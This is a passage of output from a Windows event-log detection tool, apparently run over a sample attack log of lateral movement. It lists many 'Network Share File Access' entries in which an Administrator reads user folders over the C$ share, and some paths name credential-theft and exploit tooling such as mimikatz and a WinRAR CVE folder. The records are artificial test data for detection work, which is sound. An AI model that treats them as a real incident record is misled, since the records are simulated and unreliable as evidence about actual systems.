Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 
